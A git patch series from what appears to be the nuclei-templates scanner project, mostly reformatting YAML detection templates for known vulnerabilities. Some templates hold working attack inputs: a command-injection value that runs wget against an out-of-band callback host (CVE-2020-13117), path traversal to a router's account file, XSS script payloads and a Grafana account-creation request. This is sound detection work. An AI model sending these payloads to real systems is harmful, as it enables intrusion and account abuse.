requests: - raw: - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded - _= + _= matchers: - type: regex diff --git a/vulnerabilities/apache/apache-flink-unauth-rce.yaml b/vulnerabilities/apache/apache-flink-unauth-rce.yaml index 9d6613cfe9..bb2304cee1 100644 --- a/vulnerabilities/apache/apache-flink-unauth-rce.yaml +++ b/vulnerabilities/apache/apache-flink-unauth-rce.yaml @@ -6,9 +6,9 @@ info: severity: critical tags: apache,flink,rce reference: - - https://www.exploit-db.com/exploits/48978 - - https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3 - - https://github.com/LandGrey/flink-unauth-rce + - https://www.exploit-db.com/exploits/48978 + - https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3 + - https://github.com/LandGrey/flink-unauth-rce requests: - raw: diff --git a/vulnerabilities/apache/apache-solr-file-read.yaml b/vulnerabilities/apache/apache-solr-file-read.yaml index dfe9936edd..56a6ada58d 100644 --- a/vulnerabilities/apache/apache-solr-file-read.yaml +++ b/vulnerabilities/apache/apache-solr-file-read.yaml @@ -6,9 +6,9 @@ info: severity: high tags: apache,solr,lfi reference: - - https://twitter.com/Al1ex4/status/1382981479727128580 - - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/ - - https://twitter.com/sec715/status/1373472323538362371 + - https://twitter.com/Al1ex4/status/1382981479727128580 + - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/ + - https://twitter.com/sec715/status/1373472323538362371 requests: - raw: diff --git a/vulnerabilities/generic/cache-poisoning.yaml b/vulnerabilities/generic/cache-poisoning.yaml index 7b9022bf80..fa843b73a4 100644 --- a/vulnerabilities/generic/cache-poisoning.yaml +++ b/vulnerabilities/generic/cache-poisoning.yaml @@ -5,8 +5,8 @@ info: author: melbadry9,xelkomy severity: info reference: - - https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning - - https://portswigger.net/research/practical-web-cache-poisoning + - https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning + - https://portswigger.net/research/practical-web-cache-poisoning tags: cache,generic requests: diff --git a/vulnerabilities/lsoft/listserv_maestro_rce.yaml b/vulnerabilities/lsoft/listserv_maestro_rce.yaml index 40ac26b75f..93b0ddba80 100644 --- a/vulnerabilities/lsoft/listserv_maestro_rce.yaml +++ b/vulnerabilities/lsoft/listserv_maestro_rce.yaml @@ -6,8 +6,8 @@ info: severity: info description: CVE-2010-1870 Struts based OGNL remote code execution in ListSERV Maestro before and including version 9.0-8. reference: - - https://www.securifera.com/advisories/sec-2020-0001/ - - https://packetstormsecurity.com/files/159643/listservmaestro-exec.txt + - https://www.securifera.com/advisories/sec-2020-0001/ + - https://packetstormsecurity.com/files/159643/listservmaestro-exec.txt requests: - method: GET diff --git a/vulnerabilities/oracle/oracle-ebs-xss.yaml b/vulnerabilities/oracle/oracle-ebs-xss.yaml index 0ec5474ea2..b684437823 100644 --- a/vulnerabilities/oracle/oracle-ebs-xss.yaml +++ b/vulnerabilities/oracle/oracle-ebs-xss.yaml @@ -6,9 +6,9 @@ info: severity: medium tags: oracle,xss,ebs reference: - - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf - - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf - - http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf + - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf + - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf + - http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf requests: - method: GET diff --git a/vulnerabilities/other/buffalo-config-injection.yaml b/vulnerabilities/other/buffalo-config-injection.yaml index 5c7a5ce8c2..ba678d6928 100644 --- a/vulnerabilities/other/buffalo-config-injection.yaml +++ b/vulnerabilities/other/buffalo-config-injection.yaml @@ -7,9 +7,9 @@ info: description: | The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution. reference: - - https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild - - https://www.tenable.com/security/research/tra-2021-13 - - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 + - https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild + - https://www.tenable.com/security/research/tra-2021-13 + - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 tags: buffalo,firmware,iot requests: diff --git a/vulnerabilities/other/concrete-xss.yaml b/vulnerabilities/other/concrete-xss.yaml index 44e6d5fa62..57ec254a12 100644 --- a/vulnerabilities/other/concrete-xss.yaml +++ b/vulnerabilities/other/concrete-xss.yaml @@ -7,9 +7,9 @@ info: severity: medium tags: concrete,xss,cms reference: - - https://hackerone.com/reports/643442 - - https://github.com/concrete5/concrete5/pull/7999 - - https://twitter.com/JacksonHHax/status/1389222207805661187 + - https://hackerone.com/reports/643442 + - https://github.com/concrete5/concrete5/pull/7999 + - https://twitter.com/JacksonHHax/status/1389222207805661187 requests: - method: GET diff --git a/vulnerabilities/other/dlink-850L-info-leak.yaml b/vulnerabilities/other/dlink-850L-info-leak.yaml index 254efe51b6..6d3d77235f 100644 --- a/vulnerabilities/other/dlink-850L-info-leak.yaml +++ b/vulnerabilities/other/dlink-850L-info-leak.yaml @@ -12,7 +12,7 @@ requests: path: - "{{BaseURL}}/hedwig.cgi" body: | - ../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml + ../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml headers: Cookie: uid=R8tBjwtFc8 Content-Type: text/xml diff --git a/vulnerabilities/other/maian-cart-preauth-rce.yaml b/vulnerabilities/other/maian-cart-preauth-rce.yaml index 03dc459bca..d9a923a421 100644 --- a/vulnerabilities/other/maian-cart-preauth-rce.yaml +++ b/vulnerabilities/other/maian-cart-preauth-rce.yaml @@ -6,9 +6,9 @@ info: severity: critical description: A severe vulnerability has been kindly reported to me by security advisor DreyAnd. The issue concerns the elFinder file manager plugin in Maian Cart and it affects all versions from 3.0 to 3.8. reference: - - https://dreyand.github.io/maian-cart-rce/ - - https://github.com/DreyAnd/maian-cart-rce - - https://www.maianscriptworld.co.uk/critical-updates + - https://dreyand.github.io/maian-cart-rce/ + - https://github.com/DreyAnd/maian-cart-rce + - https://www.maianscriptworld.co.uk/critical-updates tags: rce,unauth,maian requests: diff --git a/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml b/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml index a138c0ceb1..0eac266103 100644 --- a/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml +++ b/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml @@ -5,8 +5,8 @@ info: author: infosecsanyam severity: medium reference: - - https://www.shodan.io/search?query=http.title%3A%22Outlook%22 - - https://blog.orange.tw/2021/08/proxyoracle-a-new-attack-surface-on-ms-exchange-part-2.html + - https://www.shodan.io/search?query=http.title%3A%22Outlook%22 + - https://blog.orange.tw/2021/08/proxyoracle-a-new-attack-surface-on-ms-exchange-part-2.html tags: miscrsoft,exchange,owa,xss requests: diff --git a/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml b/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml index c03bb02530..a1913d882f 100644 --- a/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml +++ b/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml @@ -5,8 +5,8 @@ info: author: dhiyaneshDk severity: medium reference: - - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/nginx-merge-slashes-path-traversal.json - - https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d + - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/nginx-merge-slashes-path-traversal.json + - https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d tags: exposure,config,lfi,nginx requests: diff --git a/vulnerabilities/other/opensns-rce.yaml b/vulnerabilities/other/opensns-rce.yaml index 57dc49ae6e..5bccb904ea 100644 --- a/vulnerabilities/other/opensns-rce.yaml +++ b/vulnerabilities/other/opensns-rce.yaml @@ -5,8 +5,8 @@ info: author: gy741 severity: critical reference: - - http://www.0dayhack.net/index.php/2417/ - - https://www.pwnwiki.org/index.php?title=OpenSNS_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E + - http://www.0dayhack.net/index.php/2417/ + - https://www.pwnwiki.org/index.php?title=OpenSNS_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E tags: opensns,rce requests: diff --git a/vulnerabilities/other/rconfig-rce.yaml b/vulnerabilities/other/rconfig-rce.yaml index 5d4a64ee03..393ae08a2a 100644 --- a/vulnerabilities/other/rconfig-rce.yaml +++ b/vulnerabilities/other/rconfig-rce.yaml @@ -9,8 +9,8 @@ info: # This template supports the user creation part only. # To triggering an RCE, see reference[2]. reference: - - https://www.rconfig.com/downloads/rconfig-3.9.5.zip - - https://www.exploit-db.com/exploits/48878 + - https://www.rconfig.com/downloads/rconfig-3.9.5.zip + - https://www.exploit-db.com/exploits/48878 requests: - raw: diff --git a/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml b/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml index 417e1cbc8a..95c345c98a 100644 --- a/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml +++ b/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml @@ -5,8 +5,8 @@ info: author: PR3R00T severity: critical reference: - - https://twitter.com/chybeta/status/1353974652540882944 - - https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/ + - https://twitter.com/chybeta/status/1353974652540882944 + - https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/ tags: shellshock,sonicwall,rce,vpn requests: diff --git a/vulnerabilities/other/wooyun-path-traversal.yaml b/vulnerabilities/other/wooyun-path-traversal.yaml index 515f1293b5..3956371181 100644 --- a/vulnerabilities/other/wooyun-path-traversal.yaml +++ b/vulnerabilities/other/wooyun-path-traversal.yaml @@ -6,9 +6,9 @@ info: severity: high reference: https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html description: | - A general document of UFIDA ERP-NC contains a vulnerability - (affecting a large number of well-known school government and enterprise cases - such as COFCO/Minsheng E-commerce/Tsinghua University/Aigo) + A general document of UFIDA ERP-NC contains a vulnerability + (affecting a large number of well-known school government and enterprise cases + such as COFCO/Minsheng E-commerce/Tsinghua University/Aigo) tags: lfi requests: diff --git a/vulnerabilities/other/yapi-rce.yaml b/vulnerabilities/other/yapi-rce.yaml index d3c9c3cab1..5fc0d294da 100644 --- a/vulnerabilities/other/yapi-rce.yaml +++ b/vulnerabilities/other/yapi-rce.yaml @@ -6,10 +6,10 @@ info: severity: critical tags: yapi,rce reference: - - https://www.secpulse.com/archives/162502.html - - https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b - - https://twitter.com/sec715/status/1415484190561161216 - - https://github.com/YMFE/yapi + - https://www.secpulse.com/archives/162502.html + - https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b + - https://twitter.com/sec715/status/1415484190561161216 + - https://github.com/YMFE/yapi requests: - raw: diff --git a/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml b/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml index a536f56a59..4e45972403 100644 --- a/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml +++ b/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml @@ -6,8 +6,8 @@ info: severity: critical tags: wordpress,woocomernce,sqli,wp-plugin reference: - - https://woocommerce.com/posts/critical-vulnerability-detected-july-2021 - - https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx + - https://woocommerce.com/posts/critical-vulnerability-detected-july-2021 + - https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx requests: - method: GET diff --git a/vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml b/vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml index bf94656f63..4a0d110f9c 100644 --- a/vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml +++ b/vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml @@ -7,8 +7,8 @@ info: description: Critical Information Disclosure on WP Courses plugin < 2.0.29 exposes private course videos and materials tags: wordpress,plugin reference: - - https://www.exploit-db.com/exploits/48910 - - https://www.redtimmy.com/critical-information-disclosure-on-wp-courses-plugin-exposes-private-course-videos-and-materials/ + - https://www.exploit-db.com/exploits/48910 + - https://www.redtimmy.com/critical-information-disclosure-on-wp-courses-plugin-exposes-private-course-videos-and-materials/ requests: - method: GET diff --git a/vulnerabilities/wordpress/wp-123contactform-plugin-listing.yaml b/vulnerabilities/wordpress/wp-123contactform-plugin-listing.yaml index 5b19ad3ae3..5b4e1dba05 100644 --- a/vulnerabilities/wordpress/wp-123contactform-plugin-listing.yaml +++ b/vulnerabilities/wordpress/wp-123contactform-plugin-listing.yaml @@ -6,8 +6,8 @@ info: severity: info description: Searches for sensitive directories present in the wordpress-plugins plugin. reference: - - https://blog.sucuri.net/2021/01/critical-vulnerabilities-in-123contactform-for-wordpress-wordpress-plugin.html - - https://www.exploit-db.com/ghdb/6979 + - https://blog.sucuri.net/2021/01/critical-vulnerabilities-in-123contactform-for-wordpress-wordpress-plugin.html + - https://www.exploit-db.com/ghdb/6979 tags: wordpress,listing requests: diff --git a/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml b/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml index b4305c81e7..991edafc3b 100644 --- a/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml +++ b/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml @@ -7,8 +7,8 @@ info: tags: wordpress,wp-plugin,lfi description: Arbitrary file download in Memphis Document Library 3.1.5 reference: - - https://www.exploit-db.com/exploits/39593 - - https://wpscan.com/vulnerability/53999c06-05ca-44f1-b713-1e4d6b4a3f9f + - https://www.exploit-db.com/exploits/39593 + - https://wpscan.com/vulnerability/53999c06-05ca-44f1-b713-1e4d6b4a3f9f requests: - method: GET diff --git a/vulnerabilities/wordpress/wp-slideshow-xss.yaml b/vulnerabilities/wordpress/wp-slideshow-xss.yaml index 61a03ab44b..a2ef9e9166 100644 --- a/vulnerabilities/wordpress/wp-slideshow-xss.yaml +++ b/vulnerabilities/wordpress/wp-slideshow-xss.yaml @@ -11,9 +11,9 @@ requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' -# - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' -# - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' -# - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' + # - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' + # - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' + # - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' matchers-condition: and matchers: diff --git a/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml b/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml index 82c7b74499..08ee90fd10 100644 --- a/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml +++ b/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml @@ -6,9 +6,9 @@ info: severity: medium description: Allows attacker to view sensitive information such as company invoices reference: - - https://twitter.com/sec_hawk/status/1426984595094913025?s=21 - - https://github.com/Mohammedsaneem/wordpress-upload-information-disclosure/blob/main/worpress-upload.yaml - - https://woocommerce.com/products/pdf-invoices/ + - https://twitter.com/sec_hawk/status/1426984595094913025?s=21 + - https://github.com/Mohammedsaneem/wordpress-upload-information-disclosure/blob/main/worpress-upload.yaml + - https://woocommerce.com/products/pdf-invoices/ tags: wordpress,listing,exposure requests: From 247b07a76af3bf91643bca674cadb7809973d738 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 19 Aug 2021 22:11:11 +0530 Subject: [PATCH 1750/4083] Added grafana-public-signup --- misconfiguration/grafana-public-signup.yaml | 35 +++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 misconfiguration/grafana-public-signup.yaml diff --git a/misconfiguration/grafana-public-signup.yaml b/misconfiguration/grafana-public-signup.yaml new file mode 100644 index 0000000000..49bb9c6ad7 --- /dev/null +++ b/misconfiguration/grafana-public-signup.yaml @@ -0,0 +1,35 @@ +id: grafana-public-signup + +info: + name: Grafana Public Signup + author: pdteam + severity: medium + tags: grafana + +requests: + - raw: + - | + POST /api/user/signup/step2 HTTP/1.1 + Host: {{Hostname}} + content-type: application/json + Origin: {{BaseURL}} + Referer: {{BaseURL}} + + {"username":"{{randstr}}@tld","password":"{{randstr_1}}"} + + matchers-condition: and + matchers: + - type: word + words: + - "User sign up completed successfully" + + - type: word + words: + - "grafana_sess" + - "grafana_user" + condition: and + part: header + + - type: status + status: + - 200 From a5fedafce9464a723b2db0b1fdb6bacda6b4b38a Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 19 Aug 2021 22:12:15 +0530 Subject: [PATCH 1751/4083] workflow update --- workflows/grafana-workflow.yaml | 6 +----- 1 file changed, 1 insertion(+), 5 deletions(-) diff --git a/workflows/grafana-workflow.yaml b/workflows/grafana-workflow.yaml index 605669879b..6bff88bb5f 100644 --- a/workflows/grafana-workflow.yaml +++ b/workflows/grafana-workflow.yaml @@ -6,12 +6,8 @@ info: description: A simple workflow that runs all Grafana related nuclei templates on a given target. tags: workflow - # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) - # Old workflows still remains valid, and will be working with all nuclei versions. - workflows: - - template: exposed-panels/grafana-detect.yaml subtemplates: - - template: default-logins/grafana/grafana-default-credential.yaml + - tags: grafana From 4f1e61f0210fe1c7259c76f27fab98ab36bd6e0b Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 19 Aug 2021 22:39:56 +0530 Subject: [PATCH 1752/4083] Adding unique prefix for identification --- misconfiguration/grafana-public-signup.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/grafana-public-signup.yaml b/misconfiguration/grafana-public-signup.yaml index 49bb9c6ad7..41dd22e62b 100644 --- a/misconfiguration/grafana-public-signup.yaml +++ b/misconfiguration/grafana-public-signup.yaml @@ -15,7 +15,7 @@ requests: Origin: {{BaseURL}} Referer: {{BaseURL}} - {"username":"{{randstr}}@tld","password":"{{randstr_1}}"} + {"username":"nuclei_{{randstr}}","password":"{{randstr_1}}"} matchers-condition: and matchers: From 20d1f0a54f7531a5d64cc717a9499214908f1d6f Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 19 Aug 2021 22:59:45 +0530 Subject: [PATCH 1753/4083] Added intrusive tag Added intrusive tag for identification / exclusion as discussed here - https://github.com/projectdiscovery/nuclei/discussions/551 --- misconfiguration/grafana-public-signup.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/grafana-public-signup.yaml b/misconfiguration/grafana-public-signup.yaml index 41dd22e62b..0d88970cf3 100644 --- a/misconfiguration/grafana-public-signup.yaml +++ b/misconfiguration/grafana-public-signup.yaml @@ -4,7 +4,7 @@ info: name: Grafana Public Signup author: pdteam severity: medium - tags: grafana + tags: grafana,intrusive requests: - raw: From 1247fcd9931f82a9a8527bd70d9206ab8e6c873f Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Thu, 19 Aug 2021 23:09:26 +0530 Subject: [PATCH 1754/4083] Update vulnerabilities/other/caucho-resin-info-disclosure.yaml Co-authored-by: Toufik Airane --- .../other/caucho-resin-info-disclosure.yaml | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) diff --git a/vulnerabilities/other/caucho-resin-info-disclosure.yaml b/vulnerabilities/other/caucho-resin-info-disclosure.yaml index 47ea854c55..a4569ce386 100644 --- a/vulnerabilities/other/caucho-resin-info-disclosure.yaml +++ b/vulnerabilities/other/caucho-resin-info-disclosure.yaml @@ -12,12 +12,10 @@ requests: - "{{BaseURL}}/resin-doc/viewfile/?file=/WEB-INF/resin-web.xml" #ver:3.0.17/3.0.18 - "{{BaseURL}}/%20../web-inf/web.xml" #ver:3.1.1 - matchers-condition: and matchers: - - type: status - status: - - 200 - type: word words: - - "WEB-INF" - part: body \ No newline at end of file + - "" + part: body + condition: and \ No newline at end of file From ab824564d3f6338f1f387fde6985cd287bb76c66 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Thu, 19 Aug 2021 23:11:29 +0530 Subject: [PATCH 1755/4083] minor updates --- .../other/caucho-resin-info-disclosure.yaml | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/vulnerabilities/other/caucho-resin-info-disclosure.yaml b/vulnerabilities/other/caucho-resin-info-disclosure.yaml index a4569ce386..f4fa330ad9 100644 --- a/vulnerabilities/other/caucho-resin-info-disclosure.yaml +++ b/vulnerabilities/other/caucho-resin-info-disclosure.yaml @@ -9,13 +9,18 @@ info: requests: - method: GET path: - - "{{BaseURL}}/resin-doc/viewfile/?file=/WEB-INF/resin-web.xml" #ver:3.0.17/3.0.18 - - "{{BaseURL}}/%20../web-inf/web.xml" #ver:3.1.1 + - "{{BaseURL}}/resin-doc/viewfile/?file=/WEB-INF/resin-web.xml" # Version: 3.0.17/3.0.18 + - "{{BaseURL}}/%20../web-inf/web.xml" # Version: 3.1.1 + matchers-condition: and matchers: - type: word words: - "" part: body - condition: and \ No newline at end of file + condition: and + + - type: status + status: + - 200 From 0ef2106a6e1d2f547f1c16f96fbdf978362b5923 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 19 Aug 2021 23:34:16 +0530 Subject: [PATCH 1756/4083] Improved template --- .../other/showdoc-file-upload-rce.yaml | 25 +++++++------------ 1 file changed, 9 insertions(+), 16 deletions(-) diff --git a/vulnerabilities/other/showdoc-file-upload-rce.yaml b/vulnerabilities/other/showdoc-file-upload-rce.yaml index 63fa6a1f77..d61b1a5d52 100644 --- a/vulnerabilities/other/showdoc-file-upload-rce.yaml +++ b/vulnerabilities/other/showdoc-file-upload-rce.yaml @@ -24,26 +24,19 @@ requests: ----------------------------835846770881083140190633-- - - | - GET /Public/Uploads{{url_decode("§path§")}} HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - - extractors: - - type: regex - name: path - group: 1 - internal: true - part: body - regex: - - '/Uploads\\(.*?)"\,"success"' - matchers-condition: and matchers: - type: word words: - - '3c7cb9f46815a790686b857fdbc4295a' + - '"url":"http:' + - '"success":1' + condition: and - type: status status: - - 200 \ No newline at end of file + - 200 + + extractors: + - type: json + json: + - '.url' \ No newline at end of file From 3fe4bc5206f1373a8bd4f4435c9655fa6bd4d64f Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 19 Aug 2021 23:39:29 +0530 Subject: [PATCH 1757/4083] minor update --- .github/workflows/template-validate.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index dc67264c3f..f833bba65f 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -26,7 +26,7 @@ jobs: env: GO111MODULE: on run: | - go get -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@dev + go get -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei shell: bash - name: Template Validation From 3f803deb287b0d09e739367a6214058046fc88fb Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 20 Aug 2021 02:14:42 +0530 Subject: [PATCH 1758/4083] more updates --- cves/2019/CVE-2019-8446.yaml | 1 - cves/2020/CVE-2020-13117.yaml | 6 +---- cves/2020/CVE-2020-5307.yaml | 2 -- cves/2021/CVE-2021-24472.yaml | 2 -- cves/2021/CVE-2021-26855.yaml | 2 +- cves/2021/CVE-2021-28149.yaml | 14 +---------- exposed-panels/microsoft-exchange-login.yaml | 23 ------------------- misconfiguration/aem/aem-groovyconsole.yaml | 1 - .../microsoft-exchange-server-detect.yaml | 19 +++++++-------- 9 files changed, 13 insertions(+), 57 deletions(-) delete mode 100644 exposed-panels/microsoft-exchange-login.yaml diff --git a/cves/2019/CVE-2019-8446.yaml b/cves/2019/CVE-2019-8446.yaml index dbddb27ac5..1dd04da7ee 100644 --- a/cves/2019/CVE-2019-8446.yaml +++ b/cves/2019/CVE-2019-8446.yaml @@ -12,7 +12,6 @@ requests: - | POST /rest/issueNav/1/issueTable HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 Connection: Close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 X-Atlassian-Token: no-check diff --git a/cves/2020/CVE-2020-13117.yaml b/cves/2020/CVE-2020-13117.yaml index 158a9a0af5..a1f55821f9 100644 --- a/cves/2020/CVE-2020-13117.yaml +++ b/cves/2020/CVE-2020-13117.yaml @@ -14,16 +14,12 @@ requests: - | POST /cgi-bin/login.cgi HTTP/1.1 Host: {{Hostname}} - Cache-Control: max-age=0 - Upgrade-Insecure-Requests: 1 Origin: http://{{Hostname}} Content-Type: application/x-www-form-urlencoded - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate - Connection: close newUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2F{{interactsh-url}}%3B%60%3B%23&password=asd&lang_select=en + matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction diff --git a/cves/2020/CVE-2020-5307.yaml b/cves/2020/CVE-2020-5307.yaml index 55fcfc1b84..cb9955117e 100644 --- a/cves/2020/CVE-2020-5307.yaml +++ b/cves/2020/CVE-2020-5307.yaml @@ -15,8 +15,6 @@ requests: POST /dfsms/ HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Connection: close Content-Length: 66 diff --git a/cves/2021/CVE-2021-24472.yaml b/cves/2021/CVE-2021-24472.yaml index 0b37b8ef3d..b45ea11b81 100644 --- a/cves/2021/CVE-2021-24472.yaml +++ b/cves/2021/CVE-2021-24472.yaml @@ -14,8 +14,6 @@ requests: GET /?qtproxycall=http://{{interactsh-url}} HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) matchers-condition: and matchers: diff --git a/cves/2021/CVE-2021-26855.yaml b/cves/2021/CVE-2021-26855.yaml index 9c0ce7bd98..70ec610b65 100644 --- a/cves/2021/CVE-2021-26855.yaml +++ b/cves/2021/CVE-2021-26855.yaml @@ -6,7 +6,7 @@ info: severity: critical 